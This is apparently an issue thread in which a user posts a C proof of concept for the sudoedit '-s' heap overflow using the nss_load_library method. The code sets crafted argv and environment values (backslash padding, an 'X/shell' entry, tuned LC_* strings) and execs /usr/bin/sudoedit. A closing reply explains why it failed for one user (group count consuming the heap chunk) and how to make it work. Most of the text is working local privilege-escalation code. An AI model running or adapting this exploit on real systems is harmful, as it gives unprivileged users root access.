Work when uid=0, but not uid=1000

[GeraldYan]

hi,
The PoC script did not work with my ubuntu 20.04.1 enviroment , so I try to make my own poc script based on the fuzz and exploit methhod.
For debugging convenience ， I did this with root user. After some works, a poc worked with nss_load_library() method.
But when switch to general user , the script did not work, because the heap chunk I used to overflow was pre allocated and store somethins like groups=4,24,27,30,46,120,131,132,1000
I have no idea why this happened, I want to know what is the difference between running this script through root user and normal user. Looking forward to your help .Thanks!

Here is my poc.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <ctype.h>

#define SUDOEDIT_PATH "/usr/bin/sudoedit"

int main(int argc, char *argv[]) {
 char *s_argv[]={
  "sudoedit",
   "-s",
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
  "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\",
  NULL
 };

 char *s_envp[]={
  "B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\", 
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", 
  "X/shell","\\",
  "LC_TELEPHONE=C.UTF-8@Aa3QLwXb3PJLmiDQinnGV9WSiGrxWfRd04R1I2kOLtQyEvuehEJTM7yffnSZwxBdlOaevjyiYbA0wUMP7oPZ",
  "LC_NUMERIC=C.UTF-8@AwuefJrxO4MZdmyVPaVPYnPNVkMkkTZSKDmPTTYlKbE",
  "AgvAS=AKz0",
  NULL
 };

 printf("GOOD LUCK \n");
 printf("%d\n", getuid());
 printf("the pid is: %d\n", getpid());
 for(int i=0;i<10;i++){
     // wait to attach
     printf("%d\n", i);
     sleep(1);
 }
 execve(SUDOEDIT_PATH, s_argv, s_envp);

 return 0;
}

[GeraldYan]

I found the reason. This is because in sudo.c, get_user_groups() took my heap chunk away because my test user happens to belong to 9 groups . Just change to another general user.